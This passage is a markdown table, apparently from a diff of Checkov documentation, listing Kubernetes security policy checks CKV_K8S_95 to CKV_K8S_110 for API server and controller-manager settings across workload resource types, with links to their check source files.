[ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | -| 3144 | CKV_K8S_95 | resource | PodTemplate | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | -| 3145 | CKV_K8S_95 | resource | ReplicaSet | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | -| 3146 | CKV_K8S_95 | resource | ReplicationController | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | -| 3147 | CKV_K8S_95 | resource | StatefulSet | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | -| 3148 | CKV_K8S_96 | resource | CronJob | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | -| 3149 | CKV_K8S_96 | resource | DaemonSet | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | -| 3150 | CKV_K8S_96 | resource | Deployment | Ensure that the --service-account-lookup argument is set to true | Kubernetes | 
[ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | -| 3151 | CKV_K8S_96 | resource | DeploymentConfig | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | -| 3152 | CKV_K8S_96 | resource | Job | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | -| 3153 | CKV_K8S_96 | resource | Pod | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | -| 3154 | CKV_K8S_96 | resource | PodTemplate | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | -| 3155 | CKV_K8S_96 | resource | ReplicaSet | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | -| 3156 | CKV_K8S_96 | resource | ReplicationController | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | -| 3157 | CKV_K8S_96 | resource | StatefulSet | Ensure that the --service-account-lookup argument is set to true 
| Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | -| 3158 | CKV_K8S_97 | resource | CronJob | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | -| 3159 | CKV_K8S_97 | resource | DaemonSet | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | -| 3160 | CKV_K8S_97 | resource | Deployment | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | -| 3161 | CKV_K8S_97 | resource | DeploymentConfig | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | -| 3162 | CKV_K8S_97 | resource | Job | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | -| 3163 | CKV_K8S_97 | resource | Pod | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | -| 3164 | CKV_K8S_97 | resource | PodTemplate | 
Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | -| 3165 | CKV_K8S_97 | resource | ReplicaSet | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | -| 3166 | CKV_K8S_97 | resource | ReplicationController | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | -| 3167 | CKV_K8S_97 | resource | StatefulSet | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | -| 3168 | CKV_K8S_99 | resource | CronJob | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | -| 3169 | CKV_K8S_99 | resource | DaemonSet | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | -| 3170 | CKV_K8S_99 | resource | Deployment | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | 
[ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | -| 3171 | CKV_K8S_99 | resource | DeploymentConfig | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | -| 3172 | CKV_K8S_99 | resource | Job | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | -| 3173 | CKV_K8S_99 | resource | Pod | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | -| 3174 | CKV_K8S_99 | resource | PodTemplate | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | -| 3175 | CKV_K8S_99 | resource | ReplicaSet | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | -| 3176 | CKV_K8S_99 | resource | ReplicationController | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | -| 3177 | CKV_K8S_99 | resource | StatefulSet | Ensure that the --etcd-certfile and 
--etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | -| 3178 | CKV_K8S_100 | resource | CronJob | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | -| 3179 | CKV_K8S_100 | resource | DaemonSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | -| 3180 | CKV_K8S_100 | resource | Deployment | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | -| 3181 | CKV_K8S_100 | resource | DeploymentConfig | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | -| 3182 | CKV_K8S_100 | resource | Job | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | -| 3183 | CKV_K8S_100 | resource | Pod | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | 
[ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | -| 3184 | CKV_K8S_100 | resource | PodTemplate | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | -| 3185 | CKV_K8S_100 | resource | ReplicaSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | -| 3186 | CKV_K8S_100 | resource | ReplicationController | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | -| 3187 | CKV_K8S_100 | resource | StatefulSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [ApiServerTlsCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerTlsCertAndKey.py) | -| 3188 | CKV_K8S_102 | resource | CronJob | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | -| 3189 | CKV_K8S_102 | resource | DaemonSet | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | -| 3190 | CKV_K8S_102 | resource | Deployment | Ensure that the --etcd-cafile argument is set as appropriate | 
Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | -| 3191 | CKV_K8S_102 | resource | DeploymentConfig | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | -| 3192 | CKV_K8S_102 | resource | Job | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | -| 3193 | CKV_K8S_102 | resource | Pod | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | -| 3194 | CKV_K8S_102 | resource | PodTemplate | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | -| 3195 | CKV_K8S_102 | resource | ReplicaSet | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | -| 3196 | CKV_K8S_102 | resource | ReplicationController | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | [ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | -| 3197 | CKV_K8S_102 | resource | StatefulSet | Ensure that the --etcd-cafile argument is set as appropriate | Kubernetes | 
[ApiServerEtcdCaFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCaFile.py) | -| 3198 | CKV_K8S_104 | resource | CronJob | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | -| 3199 | CKV_K8S_104 | resource | DaemonSet | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | -| 3200 | CKV_K8S_104 | resource | Deployment | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | -| 3201 | CKV_K8S_104 | resource | DeploymentConfig | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | -| 3202 | CKV_K8S_104 | resource | Job | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | -| 3203 | CKV_K8S_104 | resource | Pod | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | -| 3204 | CKV_K8S_104 | resource | PodTemplate | Ensure that encryption providers are appropriately configured | Kubernetes | 
[ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | -| 3205 | CKV_K8S_104 | resource | ReplicaSet | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | -| 3206 | CKV_K8S_104 | resource | ReplicationController | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | -| 3207 | CKV_K8S_104 | resource | StatefulSet | Ensure that encryption providers are appropriately configured | Kubernetes | [ApiServerEncryptionProviders.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEncryptionProviders.py) | -| 3208 | CKV_K8S_105 | resource | CronJob | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | -| 3209 | CKV_K8S_105 | resource | DaemonSet | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | -| 3210 | CKV_K8S_105 | resource | Deployment | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) | -| 3211 | CKV_K8S_105 | resource | DeploymentConfig | 
Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) |
-| 3212 | CKV_K8S_105 | resource | Job | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) |
-| 3213 | CKV_K8S_105 | resource | Pod | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) |
-| 3214 | CKV_K8S_105 | resource | PodTemplate | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) |
-| 3215 | CKV_K8S_105 | resource | ReplicaSet | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) |
-| 3216 | CKV_K8S_105 | resource | ReplicationController | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) |
-| 3217 | CKV_K8S_105 | resource | StatefulSet | Ensure that the API Server only makes use of Strong Cryptographic Ciphers | Kubernetes | [ApiServerStrongCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerStrongCryptographicCiphers.py) |
-| 3218 | CKV_K8S_106 | resource | CronJob | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) |
-| 3219 | CKV_K8S_106 | resource | DaemonSet | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) |
-| 3220 | CKV_K8S_106 | resource | Deployment | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) |
-| 3221 | CKV_K8S_106 | resource | DeploymentConfig | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) |
-| 3222 | CKV_K8S_106 | resource | Job | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) |
-| 3223 | CKV_K8S_106 | resource | Pod | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) |
-| 3224 | CKV_K8S_106 | resource | PodTemplate | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) |
-| 3225 | CKV_K8S_106 | resource | ReplicaSet | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) |
-| 3226 | CKV_K8S_106 | resource | ReplicationController | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) |
-| 3227 | CKV_K8S_106 | resource | StatefulSet | Ensure that the --terminated-pod-gc-threshold argument is set as appropriate | Kubernetes | [KubeControllerManagerTerminatedPods.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerTerminatedPods.py) |
-| 3228 | CKV_K8S_107 | resource | CronJob | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) |
-| 3229 | CKV_K8S_107 | resource | DaemonSet | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) |
-| 3230 | CKV_K8S_107 | resource | Deployment | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) |
-| 3231 | CKV_K8S_107 | resource | DeploymentConfig | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) |
-| 3232 | CKV_K8S_107 | resource | Job | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) |
-| 3233 | CKV_K8S_107 | resource | Pod | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) |
-| 3234 | CKV_K8S_107 | resource | PodTemplate | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) |
-| 3235 | CKV_K8S_107 | resource | ReplicaSet | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) |
-| 3236 | CKV_K8S_107 | resource | ReplicationController | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) |
-| 3237 | CKV_K8S_107 | resource | StatefulSet | Ensure that the --profiling argument is set to false | Kubernetes | [KubeControllerManagerBlockProfiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerBlockProfiles.py) |
-| 3238 | CKV_K8S_108 | resource | CronJob | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) |
-| 3239 | CKV_K8S_108 | resource | DaemonSet | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) |
-| 3240 | CKV_K8S_108 | resource | Deployment | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) |
-| 3241 | CKV_K8S_108 | resource | DeploymentConfig | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) |
-| 3242 | CKV_K8S_108 | resource | Job | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) |
-| 3243 | CKV_K8S_108 | resource | Pod | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) |
-| 3244 | CKV_K8S_108 | resource | PodTemplate | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) |
-| 3245 | CKV_K8S_108 | resource | ReplicaSet | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) |
-| 3246 | CKV_K8S_108 | resource | ReplicationController | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) |
-| 3247 | CKV_K8S_108 | resource | StatefulSet | Ensure that the --use-service-account-credentials argument is set to true | Kubernetes | [KubeControllerManagerServiceAccountCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountCredentials.py) |
-| 3248 | CKV_K8S_110 | resource | CronJob | Ensure that the --service-account-private-key-file argument is set as appropriate | Kubernetes | [KubeControllerManagerServiceAccountPrivateKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeControllerManagerServiceAccountPrivateKeyFile.py) |
